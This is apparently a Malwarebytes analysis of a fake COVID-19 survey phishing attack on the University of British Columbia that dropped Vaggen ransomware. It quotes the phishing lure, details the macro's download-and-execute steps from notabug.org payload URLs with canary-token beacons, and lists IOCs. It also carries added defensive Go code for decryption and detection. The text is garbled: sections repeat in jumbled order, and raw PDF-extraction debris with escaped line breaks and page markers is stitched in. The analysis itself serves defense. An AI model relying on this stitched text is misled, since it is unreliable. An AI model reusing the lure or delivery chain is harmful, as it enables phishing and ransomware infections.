Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
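Because the AES-256 key is hardcoded and every .VAGGEN file carries its own nonce and GCM tag in the clear, recovery needs nothing from the attacker. The following Go program is an added example, not the malware's code and not a Malwarebytes tool: it reproduces the file layout the post describes below (a 12-byte nonce followed by the gcm.Seal output, which is the ciphertext with the 16-byte tag appended) to build a test file, then decrypts it with the recovered key. crypto/rand stands in for CryptGenRandom, and the file contents are a constructed sample.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// VaggenKey is the hardcoded AES-256 key recovered from the sample; the trailing
// "0" pads the Swedish phrase to exactly 32 bytes.
const VaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const nonceSize = 12 // GCM's standard nonce length, as used by the sample

func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, errors.New("vaggen: AES-256 needs a 32-byte key")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// SealFile reproduces the .VAGGEN layout to make test data: nonce || gcm.Seal(plain).
// gcm.Seal appends the 16-byte tag, so the tag is the last 16 bytes of the file.
// crypto/rand stands in for CryptGenRandom, which is Windows-only.
func SealFile(key, plain []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plain, nil), nil // dst=nonce: output is nonce||ct||tag
}

// OpenFile recovers the plaintext of a .VAGGEN blob. Because GCM authenticates,
// a wrong key or a damaged file is rejected rather than silently yielding garbage.
func OpenFile(key, blob []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(blob) < nonceSize+gcm.Overhead() {
		return nil, errors.New("vaggen: file too short to hold a nonce and a tag")
	}
	plain, err := gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
	if err != nil {
		return nil, fmt.Errorf("vaggen: decryption failed (wrong key or corrupt file): %w", err)
	}
	return plain, nil
}

func main() {
	original := []byte("quarterly budget draft (constructed sample, not victim data)")
	encrypted, err := SealFile([]byte(VaggenKey), original)
	if err != nil {
		panic(err)
	}
	recovered, err := OpenFile([]byte(VaggenKey), encrypted)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%d-byte .VAGGEN blob recovered to %q\n", len(encrypted), recovered)
}
```

A real decryptor would wrap OpenFile in a filepath.Walk over the victim's directories, write the plaintext next to the .VAGGEN file, and remove the original only after the authenticated decryption succeeded; GCM's tag check is what makes that last step safe.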
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) is:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

Since gcm.Seal appends the authentication tag to the ciphertext, the file is simply the nonce followed by the sealed buffer.

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money" (the trailing 0 pads the phrase to exactly 32 bytes, the AES-256 key length). Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom: the key is hardcoded and each file stores its own nonce in the clear, so a decryptor needs nothing from the attacker. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It is unclear at this point whether the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

File names are followed by their SHA-256 hashes.

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1904 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM 
Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1905 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1906 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1907 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1908 of 
The lure sent to the targets read as follows:

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a single department received the link to the shared document. A Box or Dropbox account was required to download the file, because it was shared privately rather than publicly. This may have been an attempt to evade detection, or the attacker may have expected the target organization to already be using one of those two sharing services.

Phishing document analysis

The phishing document (UBC-COVID19-Survey-Mandatory.docx) uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself carries no macro: its settings point to an external attached template, which Word fetches and loads when the document is opened, so a scanner that only looks for a VBA project inside the delivered file sees a clean document. The template was hosted on a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe and writes it as Polisen.exe
- Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe and writes it as Killar.exe
- Calls the Shell function to execute Killar.exe
- Checks the value returned by Shell to decide whether the payload started (on success it is the task ID of the new process)
- If it started, sends an HTTP GET request to canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it did not, sends an HTTP GET request to canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document with macros enabled therefore triggers a notification through the canarytokens.com service. Canary tokens are normally a defensive tool: you plant a token (a URL, a document, a DNS name) where no legitimate user should touch it and get alerted when something does, which makes them a cheap early warning that an intruder has reached part of your network. Here the attacker turns the idea around and uses a pair of tokens as success and failure beacons. They are probably interested in how many people opened the document and, from the source address of each hit, perhaps where those people are.
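Template injection leaves a fingerprint that can be checked before a document is ever opened: a .docx is a zip package, and the attached template is declared in word/_rels/settings.xml.rels as a Relationship of type attachedTemplate whose Target is an external URL (MITRE ATT&CK T1221). The Go program below is an added example written for this page, not code from the analysis or from the attacker's toolkit. It builds a small constructed .docx in memory with such a relationship (the URL in it is a placeholder, not the real notabug.org path, which is not reproduced here), then scans every .rels part of the package and reports attachedTemplate relationships whose target is an http(s) URL or a UNC path.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// relationships mirrors an OOXML .rels part; only the attributes the check needs are mapped.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// isRemote reports whether a target makes Word reach out over the network (http(s) URL
// or UNC path). Local file:/// targets such as a user's own Normal.dotm are not flagged.
func isRemote(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://") || strings.HasPrefix(t, `\\`)
}

// FindRemoteTemplates opens a .docx (a zip package), parses every .rels part and returns
// one "part (rId) -> target" line per attachedTemplate relationship with a remote target.
func FindRemoteTemplates(doc []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML package: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasSuffix(strings.ToLower(f.Name), ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		raw, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(raw, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") && isRemote(r.Target) {
				hits = append(hits, fmt.Sprintf("%s (%s) -> %s", f.Name, r.ID, r.Target))
			}
		}
	}
	return hits, nil
}

// BuildSampleDocx assembles a minimal, constructed package whose settings part declares
// an attachedTemplate with the given target; it stands in for the phishing document.
func BuildSampleDocx(target string, external bool) []byte {
	const ns = "http://schemas.openxmlformats.org"
	mode := ""
	if external {
		mode = ` TargetMode="External"`
	}
	parts := map[string]string{
		"word/settings.xml": `<w:settings xmlns:w="` + ns + `/wordprocessingml/2006/main" xmlns:r="` + ns +
			`/officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/></w:settings>`,
		"word/_rels/settings.xml.rels": `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` +
			`<Relationships xmlns="` + ns + `/package/2006/relationships"><Relationship Id="rId1" Type="` + ns +
			`/officeDocument/2006/relationships/attachedTemplate" Target="` + target + `"` + mode + `/></Relationships>`,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, _ := zw.Create(name) // in-memory writer: Create and Write cannot fail here
		w.Write([]byte(body))
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	hits, err := FindRemoteTemplates(BuildSampleDocx("https://example.test/Word-Templates/raw/master/template.dotm", true))
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Println("remote attachedTemplate:", h)
	}
	benign, _ := FindRemoteTemplates(BuildSampleDocx("Normal.dotm", false))
	fmt.Println("findings in benign sample:", len(benign))
}
```

To scan a real file, read it with os.ReadFile and hand the bytes to FindRemoteTemplates. Local file:/// references (typically the user's own Normal.dotm) are common and benign, which is why only network targets are flagged; a .dotm fetched from a code-hosting site by someone who has no business loading that template is the thing to alert on. The macro itself, with its download-and-execute logic and canary beacons, lives in the fetched template and can be extracted from it with a tool such as olevba.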
Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files, appending the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, whose entry point is the function denoted as 'main_main'. Other functions belonging to the main package have obfuscated names such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA; several of them again look like Swedish words (SPRINGA is "run", LAMNARDETTA reads as "lämnar detta", "leaves this"). The ones we identified map to the following functionality:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (for example the content of the ransom note) are stored encrypted with XXTEA, using the xxtea-go library. Each encrypted chunk is first decoded from Base64 and then decrypted with the hardcoded XXTEA key "STALKER". At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback passed to the standard Go library function path/filepath.Walk, which visits every file under the chosen root directory.
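To read those strings without running the sample, the Base64 and XXTEA layers have to be undone in the same conventions xxtea-go uses: little-endian 32-bit words, the plaintext byte length appended as a trailing word, and a key shorter than 16 bytes zero-padded. The Go code below is an added example written for this page, not code from the analysis or from the malware; it reimplements the reference XXTEA rounds instead of importing xxtea-go so that it runs with the standard library alone. EncryptString exists only to build a constructed fixture (the real ransom-note ciphertext is not reproduced here); DecryptString is the function a reverse engineer would point at Base64 constants dumped from the binary.

```go
package main

import (
	"encoding/base64"
	"fmt"
)

const delta uint32 = 0x9E3779B9 // the XXTEA round constant
// toWords packs bytes into little-endian words; withLen appends the byte count as a trailing word (xxtea-go convention).
func toWords(b []byte, withLen bool) []uint32 {
	w := make([]uint32, (len(b)+3)/4+1) // one spare word for the length
	for i, c := range b {
		w[i/4] |= uint32(c) << (uint(i%4) * 8)
	}
	if withLen {
		w[len(w)-1] = uint32(len(b))
		return w
	}
	return w[:len(w)-1]
}

// fromWords unpacks words back to little-endian bytes.
func fromWords(w []uint32) []byte {
	out := make([]byte, len(w)*4)
	for i := range out {
		out[i] = byte(w[i/4] >> (uint(i%4) * 8))
	}
	return out
}

// keyWords zero-pads or truncates the key to the 128 bits XXTEA uses, as xxtea-go does.
func keyWords(key []byte) []uint32 {
	k := make([]byte, 16)
	copy(k, key)
	return toWords(k, false)
}

func mx(sum, y, z, p, e uint32, k []uint32) uint32 {
	return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
}

// encryptWords and decryptWords are the reference XXTEA rounds (Wheeler and Needham), in place.
func encryptWords(v, k []uint32) {
	n := uint32(len(v))
	z, sum := v[n-1], uint32(0)
	for rounds := 6 + 52/n; rounds > 0; rounds-- {
		sum += delta
		e, p := (sum>>2)&3, uint32(0)
		for ; p < n-1; p++ {
			v[p] += mx(sum, v[p+1], z, p, e, k)
			z = v[p]
		}
		v[n-1] += mx(sum, v[0], z, p, e, k)
		z = v[n-1]
	}
}

func decryptWords(v, k []uint32) {
	n := uint32(len(v))
	rounds := 6 + 52/n
	y, sum := v[0], rounds*delta
	for ; rounds > 0; rounds-- {
		e := (sum >> 2) & 3
		for p := n - 1; p > 0; p-- {
			v[p] -= mx(sum, y, v[p-1], p, e, k)
			y = v[p]
		}
		v[0] -= mx(sum, y, v[n-1], 0, e, k)
		y, sum = v[0], sum-delta
	}
}

// DecryptString reverses Base64 then XXTEA; the trailing length word must be plausible, so a wrong key is an error, not garbage.
func DecryptString(b64 string, key []byte) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw) < 8 || len(raw)%4 != 0 {
		return "", fmt.Errorf("xxtea: not a Base64 XXTEA chunk (%d bytes, %v)", len(raw), err)
	}
	v := toWords(raw, false)
	decryptWords(v, keyWords(key))
	if m := int(v[len(v)-1]); m >= len(raw)-7 && m <= len(raw)-4 {
		return string(fromWords(v)[:m]), nil
	}
	return "", fmt.Errorf("xxtea: bad length word (wrong key or corrupt data)")
}

// EncryptString is the forward direction for a non-empty s, used here only to build a constructed fixture.
func EncryptString(s string, key []byte) string {
	v := toWords([]byte(s), true)
	encryptWords(v, keyWords(key))
	return base64.StdEncoding.EncodeToString(fromWords(v))
}

func main() {
	blob := EncryptString("Your files have been encrypted. Pay 80 USD in Bitcoin.", []byte("STALKER")) // constructed sample
	fmt.Println(blob)
	fmt.Println(DecryptString(blob, []byte("STALKER")))
}
```

The length word is also a practical filter: with the wrong key it decrypts to a random value and DecryptString reports an error, so the function can be run over every Base64-looking constant in the binary to find which ones are XXTEA chunks. The word order, length word and key padding here follow xxtea-go as understood by the author of this example; confirm them against one known string from the sample before trusting the output.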
Files are encrypted with AES-256 (a 32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom (12 bytes is the default nonce size of the GCM implementation in Go's crypto/cipher), and seals the file content with the gcm.Seal function.

The content of the output file (with the .VAGGEN extension) is laid out as follows:

- the 12-byte nonce
- the encrypted content
- the 16-byte GCM authentication tag

This is exactly what the common Go idiom gcm.Seal(nonce, nonce, plaintext, nil) produces: the nonce is passed as the destination prefix, and Seal appends the tag to the ciphertext. The analysis mentions no additional authenticated data, so the last argument is taken to be nil.

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money"; the trailing 0 pads the phrase to exactly 32 bytes, the AES-256 key length. Using this key, we can easily decrypt the content. Because the key is static and embedded in the binary rather than generated per victim and protected with a public key, every file encrypted by this sample can be recovered without paying the ransom, and GCM's authentication tag makes the result self-checking: a wrong key fails authentication instead of producing garbage. It appears that the malware author has not received any payment so far at this Bitcoin address.
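Putting the three facts above together (AES-256-GCM, the nonce || ciphertext || tag layout, a static 32-byte key) gives a decryptor a few dozen lines long. The Go code below is an added example written for this page, not a tool from the analysis: DecryptVaggen parses the layout and calls gcm.Open, RecoverFile applies it to a .VAGGEN file without touching the original, and sealSample builds a constructed fixture in the same layout (using crypto/rand where the sample used CryptGenRandom) so that everything runs offline. It assumes no additional authenticated data was passed to gcm.Seal, which matches the analysis but remains an assumption.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"os"
	"strings"
)

// VaggenKey is the static key reported in the analysis; its 32 bytes select AES-256.
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// DecryptVaggen parses nonce || ciphertext || tag, the layout gcm.Seal(nonce, nonce, pt, nil)
// writes, and returns the plaintext. A wrong key or a modified file fails the tag check.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // 12-byte nonce, 16-byte tag
	if err != nil {
		return nil, err
	}
	ns := gcm.NonceSize()
	if len(blob) < ns+gcm.Overhead() {
		return nil, errors.New("vaggen: file too short to hold a nonce and a tag")
	}
	pt, err := gcm.Open(nil, blob[:ns], blob[ns:], nil) // nil AAD: assumed, the analysis mentions none
	if err != nil {
		return nil, fmt.Errorf("vaggen: authentication failed (wrong key or corrupted file): %w", err)
	}
	return pt, nil
}

// RecoverFile decrypts path, which must end in .VAGGEN, into the original name beside it.
// The encrypted file is left untouched, so a failed or interrupted run can simply be repeated.
func RecoverFile(path string, key []byte) (string, error) {
	const ext = ".VAGGEN"
	if !strings.HasSuffix(path, ext) {
		return "", fmt.Errorf("vaggen: %s does not end in %s", path, ext)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	pt, err := DecryptVaggen(blob, key)
	if err != nil {
		return "", err
	}
	out := strings.TrimSuffix(path, ext)
	if _, err := os.Stat(out); err == nil {
		return "", fmt.Errorf("vaggen: %s already exists, refusing to overwrite", out)
	}
	return out, os.WriteFile(out, pt, 0o600)
}

// sealSample builds a constructed fixture in the same layout so the decryptor can be
// exercised offline; crypto/rand stands in for the CryptGenRandom call in the sample.
func sealSample(pt, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, pt, nil), nil
}

func main() {
	blob, err := sealSample([]byte("Q1 survey results (constructed sample)"), VaggenKey)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%d bytes on disk = 12 nonce + %d ciphertext + 16 tag\n", len(blob), len(blob)-28)
	pt, err := DecryptVaggen(blob, VaggenKey)
	fmt.Printf("recovered: %q (err=%v)\n", pt, err)
	_, err = DecryptVaggen(blob, []byte("wrong_key_wrong_key_wrong_key_00"))
	fmt.Println("wrong key:", err)
}
```

Because GCM authenticates, the decryptor validates itself: a wrong key, a different variant's key, or a damaged file fails with an authentication error rather than producing a plausible-looking but wrong file, so a recovery run can be trusted file by file. Work on copies, keep the .VAGGEN originals until the recovered files have been checked, and remember that the key above is the one found in this sample; another build may carry a different string.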
Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It is unclear at this point whether the University of British Columbia was the sole target. Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner, which raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

All hashes are SHA-256.

Variant 1
Remote template: summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
Payload URLs:
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
Canary token URLs:
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
Payloads:
alderson.exe 34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe 00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2
Phishing document: UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
Remote template: template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
Payload URLs:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Canary token URLs:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
Payloads:
polisen.exe 03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe 43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3
Remote template: template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
Payload URLs:
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
Canary token URLs:
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4
Remote template: smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
Payload URLs:
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
Canary token URLs:
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
Payloads:
alderson.exe b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe 00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5
Remote template: template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
Payload URLs:
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
Canary token URLs:
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
Payloads:
mrmonster.exe f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe 71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
